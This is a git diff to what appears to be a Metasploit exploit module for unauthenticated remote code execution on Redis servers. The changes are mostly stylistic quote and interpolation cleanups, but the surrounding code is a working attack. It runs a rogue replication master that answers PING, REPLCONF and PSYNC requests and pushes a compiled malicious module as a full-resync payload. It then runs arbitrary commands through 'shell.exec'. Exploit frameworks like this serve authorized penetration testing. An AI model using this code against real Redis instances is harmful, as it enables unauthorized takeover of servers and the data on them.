diff --git a/modules/exploits/linux/redis/redis_unauth_exec.rb b/modules/exploits/linux/redis/redis_unauth_exec.rb index 4375e4fc0f3f..85087743d488 100644 --- a/modules/exploits/linux/redis/redis_unauth_exec.rb +++ b/modules/exploits/linux/redis/redis_unauth_exec.rb @@ -89,12 +89,12 @@ def exploit @module_init_name = datastore['RedisModuleInit'] || Rex::Text.rand_text_alpha_lower(4..8) @module_cmd = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}" else - @module_init_name = "shell" - @module_cmd = "shell.exec" + @module_init_name = 'shell' + @module_cmd = 'shell.exec' end - if srvhost == "0.0.0.0" - fail_with(Failure::BadConfig, "Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.") + if srvhost == '0.0.0.0' + fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.') end # @@ -148,37 +148,37 @@ def start_rogue_server socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport}) print_status("Listening on #{srvhost}:#{srvport}") rsock = socket.accept() - vprint_status("Accepted a connection") + vprint_status('Accepted a connection') # Start negotiation while true request = rsock.read(1024) - vprint_status("in<<< "+request.inspect) + vprint_status("in<<< #{request.inspect}") response = "" finish = false case - when request.include?("PING") + when request.include?('PING') response = "+PONG\r\n" - when request.include?("REPLCONF") + when request.include?('REPLCONF') response = "+OK\r\n" - when request.include?("PSYNC") || request.include?("SYNC") - response = "+FULLRESYNC " + 'Z'*40 + " 1\r\n" + when request.include?('PSYNC') || request.include?('SYNC') + response = "+FULLRESYNC #{'Z'*40} 1\r\n" response << "$#{payload_bin.length}\r\n" response << "#{payload_bin}\r\n" finish = true end if response.length < 200 - vprint_status("out>>> "+response.inspect) + vprint_status("out>>> #{response.inspect}") else - vprint_status("out>>> "+response.inspect[0..100]+ "......" + response.inspect[-100..-1]) + vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}") end rsock.put(response) if finish - print_status("Rogue server close...") + print_status('Rogue server close...') rsock.close() socket.close() break @@ -199,7 +199,7 @@ def pull_the_trigger # And the command of module is hard-coded. # def execute_command(cmd, opts = {}) - redis_command("shell.exec","#{cmd.to_s}") rescue nil + redis_command('shell.exec',"#{cmd.to_s}") rescue nil end # @@ -216,13 +216,13 @@ def compile_payload vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|) vprint_status(%x|make -C #{File.dirname(make_file)} clean|) - print_status("Compile redis module extension file") + print_status('Compile redis module extension file') res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true| - if res.include? "true" - print_good("Payload #{} generate successful! ") + if res.include? 'true' + print_good("Payload generated successfully! ") else print_error(res) - fail_with(Failure::BadConfig, "Check config of gcc compiler.") + fail_with(Failure::BadConfig, 'Check config of gcc compiler.') end end